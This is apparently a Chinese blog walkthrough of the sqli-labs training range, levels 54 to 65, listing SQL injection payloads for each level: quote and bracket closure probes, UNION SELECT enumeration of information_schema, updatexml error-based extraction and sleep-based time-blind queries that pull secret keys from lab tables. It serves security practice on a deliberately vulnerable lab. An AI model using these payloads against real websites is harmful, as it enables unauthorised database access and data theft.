sqli-labs靶场challenges第54-75关（超详细）

最新推荐文章于 2024-02-05 19:04:06 发布

spade.nine

最新推荐文章于 2024-02-05 19:04:06 发布

阅读量2k

点赞数 1

分类专栏：靶机文章标签：安全数据库

本文链接：https://blog.csdn.net/weixin_51566481/article/details/126392560

版权

靶机专栏收录该内容

14 篇文章 1 订阅

订阅专栏

第五十四关（单引号闭合）：

'检查注入点，无回显猜测是有注入点，极可能是'闭合

?id=1'

order by来检测表头的长度（有多少列数据）

?id=1'order by 3--+

3不报错4报错说明这个表头长度为3

 ?id=1'order by 4--+

用select数字来看回显的是那些数据

 ?id=-1'union select 1,2,3--+

group_concat用来连接输出所有数据， information_schema.tables里面存储的是数据库的所有表，用where指定数据库，查出challenges数据库里面的表

?id=-1'union select 1,group_concat('---',table_name),3 from information_schema.tables where table_schema=database() --+

information_schema.columns里面存储了所有表column数据

?id=-1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='bsfmy3ozu2 '--+

知道数据库，表名即可拿到key

 ?id=-1'union select 1,database(),secret_X88U from challenges.bsfmy3ozu2 --+

第五十五关（括号闭合）：

尝试闭合

?id=1'--+
?id=1"--+
?id=1')--+
?id=1")--+
?id=1)--+ #闭合成功

下面正常流程不截图了

?id=1)order by 3--+
?id=1)order by 4--+
?id=1)union select 1,2,3--+

?id=-1)union select 1,group_concat('---',table_name),3 from information_schema.tables where table_schema=database() --+

?id=-1)union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='a9igyut39t '--+

#Your Password:id,sessid,secret_GFFY,tryy

?id=-1)union select 1,database(),secret_1C9Y from challenges.a9igyut39t --+

第五十六关（单引号+括号闭合）：

?id=1')--+
?id=1')order by 3--+
?id=1')order by 4--+

?id=-1')union select 1,group_concat('---',table_name),3 from information_schema.tables where table_schema=database() --+

?id=-1')union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='a4gj4m6ys3'--+

?id=-1')union select 1,database(),secret_2D7B from challenges.a4gj4m6ys3--+

第五十七关(双引号闭合)：

?id=1"--+
?id=1"order by 3--+
?id=1"order by 4--+

?id=-1"union select 1,group_concat('---',table_name),database() from information_schema.tables where table_schema=database() --+

?id=-1"union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='rjqm0ci7wu'--+

?id=-1"union select 1,database(),secret_LB75 from challenges.rjqm0ci7wu--+

第五十八关(单引号闭合报错注入)：

发现有报错，这题也可以使用报错注入

?id=1'"--+
#根据报错提示是'闭合

?id=-1'and updatexml(1,concat(0x7e,database()),0)--+
#通过报错来报数据库名

?id=-1'and updatexml(1,(select concat(0x7e,(select table_name from information_schema.tables where table_schema=database()))),0)--+

?id=-1'and updatexml(1,(select concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='442g4a2kuk'))),0)--+

?id=-1'and updatexml(1,(select concat(0x7e,(select secret_3ZLC from challenges.442g4a2kuk))),0)--+

第五十九关（数字型报错注入）：

?id=1'"--+  
#报错  ''"-- LIMIT 0,1'

?id=-1 and updatexml(1,concat(0x7e,database()),0)--+
#通过报错来报数据库名

?id=-1 and updatexml(1,(select concat(0x7e,(select table_name from information_schema.tables where table_schema=database()))),0)--+
#通过报错来报表名

?id=1 and updatexml(1,(select concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='s807gasyqb'))),0)--+
#通过报错来报表头

?id=-1 and updatexml(1,(select concat(0x7e,(select secret_4QQN from challenges.s807gasyqb))),0)--+
#通过报错来报数据拿到key

第六十关(双引号+括号闭合)：

?id=1'
?id=1"
#报错'"1"") LIMIT 0,1'   用")闭合

?id=1")and updatexml(1,(select concat(0x7e,(select table_name from information_schema.tables where table_schema=database()))),0)--+

?id=1")and updatexml(1,(select concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='353088z82v'))),0)--+

?id=1")and updatexml(1,(select concat(0x7e,(select secret_CO9B from challenges.353088z82v))),0)--+

第六十一关（单引号+双括号闭合报错注入）：

?id=1' #报错
?id=1'"--+
#报错'"-- ')) LIMIT 0,1'    用'))闭合

?id=1'))and updatexml(1,(select concat(0x7e,(select table_name from information_schema.tables where table_schema=database()))),0)--+

?id=1'))and updatexml(1,(select concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='wbbj8btit5'))),0)--+

?id=1'))and updatexml(1,(select concat(0x7e,(select secret_FT28 from challenges.wbbj8btit5))),0)--+

第六十二关（单引号+括号闭合时间盲注）：

?id=1'     #无回显
?id=1'--+  #无回显
?id=1')--+ #有回显 用')闭合

?id=1')order by 3--+
?id=1')order by 4--+


?id=1')and if(length((select table_name from information_schema.tables where table_schema=database()))>100,1,sleep(10))--+

第六十三关：

?id=1'     #无回显
?id=1'--+  #有回显 用'闭合

?id=1'order by 3--+
?id=1'order by 4--+

?id=-1'and union select 1,2,3--+   #无回显
?id=1'and sleep(10)--+   #延迟返回

payload
?id=1'and if(length((select table_name from information_schema.tables where table_schema=database()))>100,1,sleep(10))--+

第六十四关（双括号闭合）：

源码，闭合的方式是))

$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";

payload

?id=1))order by 3--+
?id=1))order by 4--+

?id=-1))union select 1,2,3--+  #没有返回有用消息
?id=1))and sleep(2)--+   #延迟返回

payload
?id=1))and if(length((select table_name from information_schema.tables where table_schema=database()))>100,1,sleep(10))--+

第六十五关(双引号+括号闭合)：

?id=1'        #有回显
?id=1"        #无回显
?id=1"--+     #无回显
?id=1")--+    #有回显 用")闭合


?id=-1")union select 1,2,3--+  #没有返回有用消息
?id=1")and sleep(2)--+   #延迟返回

payload
?id=1")and if(length((select table_name from information_schema.tables where table_schema=database()))>100,1,sleep(10))--+